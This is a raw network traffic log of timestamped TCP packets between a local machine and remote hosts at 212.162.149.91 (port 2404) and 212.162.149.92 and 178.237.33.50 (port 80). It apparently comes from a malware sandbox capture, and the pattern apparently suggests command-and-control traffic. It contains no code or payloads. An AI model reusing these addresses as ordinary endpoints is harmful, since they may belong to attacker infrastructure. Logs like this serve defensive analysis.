                                                            Dec 18, 2024 11:05:14.787282944 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.788852930 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.788949966 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.789037943 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.789098978 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.790712118 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.790800095 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.790852070 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.790920019 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.792671919 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.792769909 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.792814970 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.792876959 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.794339895 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.794444084 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.794478893 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.794540882 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.796159029 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.796247959 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.796298981 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.796531916 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.797791958 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.797873974 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.797902107 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.797959089 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.799415112 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.799493074 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.799534082 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.799593925 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.801040888 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.801136971 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.801173925 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.801234007 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.802745104 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.802828074 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:14.802901030 CET8049868212.162.149.92192.168.2.6
                                                            Dec 18, 2024 11:05:14.803781986 CET4986880192.168.2.6212.162.149.92
                                                            Dec 18, 2024 11:05:15.175010920 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.294697046 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:15.294816971 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.300199032 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:15.419816971 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.441387892 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.487668037 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.677369118 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.681329966 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.801006079 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:16.801426888 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:16.921192884 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.146975994 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.148647070 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.268297911 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.337861061 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.339261055 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.390131950 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.459137917 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.459238052 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.462903976 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:17.488167048 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.582542896 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:17.608058929 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:17.608140945 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.608278036 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:17.727814913 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:18.619187117 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.671683073 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.856240988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.863697052 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.878010988 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:18.878130913 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:18.899667025 CET498742404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:18.983248949 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:18.983355999 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.019308090 CET240449874212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.102971077 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.341979980 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342048883 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342063904 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342097044 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.342164040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342179060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342196941 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.342204094 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.342355013 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.380297899 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.380343914 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.380440950 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.382599115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.382694960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.382900000 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.391011000 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.391057968 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.391103983 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.461592913 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.461746931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.461815119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.533015013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.533071041 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.533126116 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.535479069 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.535526991 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.535617113 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.543946981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.544122934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.544193029 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.552290916 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.552315950 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.552395105 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.560745955 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.560779095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.560847998 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.569118023 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.571435928 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.571541071 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.571603060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578618050 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578758001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.578774929 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.585139036 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.585217953 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.585278034 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.593636990 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.593720913 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.593781948 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.601941109 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.602014065 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.602072001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.608921051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.608990908 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.609049082 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.615952969 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.616024971 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.616099119 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.622958899 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.623042107 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.724193096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.724291086 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.724374056 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.726645947 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.727504969 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.727581978 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.727628946 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732448101 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732502937 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.732557058 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.737297058 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.737337112 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.737349033 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.742294073 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.742338896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.742388964 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.746910095 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.746953964 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.747011900 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.751523018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.751568079 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.751614094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.755908012 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.755995035 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.756016970 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.760231018 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.760277987 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.760370970 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.764590979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.764642954 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.765737057 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.765825033 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.765872002 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.770061016 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.770142078 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.770250082 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.774405956 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.774518013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.774564981 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.778814077 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.778912067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.778966904 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.783109903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.783200979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.783250093 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.787473917 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.787587881 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.787633896 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.792047977 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.792063951 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.792117119 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.796137094 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.796269894 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.796351910 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.800493002 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.800589085 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.800627947 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.804919958 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.804991961 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.805066109 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.809171915 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.809361935 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.809499025 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.813548088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.813703060 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.813966990 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.817815065 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.817965984 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.818008900 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.822148085 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.822236061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:19.822309017 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:19.879089117 CET8049881178.237.33.50192.168.2.6
                                                            Dec 18, 2024 11:05:19.879177094 CET4988180192.168.2.6178.237.33.50
                                                            Dec 18, 2024 11:05:19.915818930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.297666073 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298332930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298350096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.298409939 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.299387932 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.299451113 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.299777031 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.300379038 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.300429106 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.300451040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301867008 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301894903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.301913023 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.303227901 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.303256035 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.303283930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.304805040 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.304820061 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.304863930 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.306040049 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.306055069 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.306087017 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.307377100 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.307679892 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.307692051 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308820009 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308845997 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.308873892 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.310158968 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.310209036 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.310297966 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311435938 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311455011 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.311482906 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.312848091 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.312865019 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.312895060 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.314100981 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.314116955 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.314150095 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.336169958 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336255074 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.336324930 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336880922 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336915016 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.336939096 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.337702036 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.337765932 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.337941885 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339309931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339359999 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.339382887 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.340276003 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.340331078 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.340351105 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.341711044 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.341767073 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.341922998 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342828035 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342925072 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.342986107 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.343815088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.343874931 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.343888998 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.344818115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.344852924 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.344896078 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.345905066 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.345956087 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.345979929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.346975088 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.347037077 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.347090960 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.348332882 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.348417044 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.348472118 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.349363089 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.349423885 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.349493980 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.350435019 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.350482941 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.350562096 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351718903 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351778030 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.351793051 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.352737904 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.352804899 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.352896929 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.353848934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.353909016 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.353949070 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.355042934 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.355102062 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.355190039 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.356245995 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.356316090 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.356584072 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.357388020 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.357464075 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.357620001 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.358515978 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.358603954 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.358643055 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.359627962 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.359698057 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.359771013 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.360768080 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.360836029 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.360894918 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.361905098 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.361965895 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.362097979 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.363146067 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.363200903 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.363271952 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364317894 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364351988 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.364372969 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.365569115 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.365694046 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.365746975 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.366516113 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.366586924 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.366645098 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.367882967 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.367947102 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.367974997 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.369016886 CET240449880212.162.149.91192.168.2.6
                                                            Dec 18, 2024 11:05:20.369072914 CET498802404192.168.2.6212.162.149.91
                                                            Dec 18, 2024 11:05:20.369195938 CET240449880212.162.149.91192.168.2.6
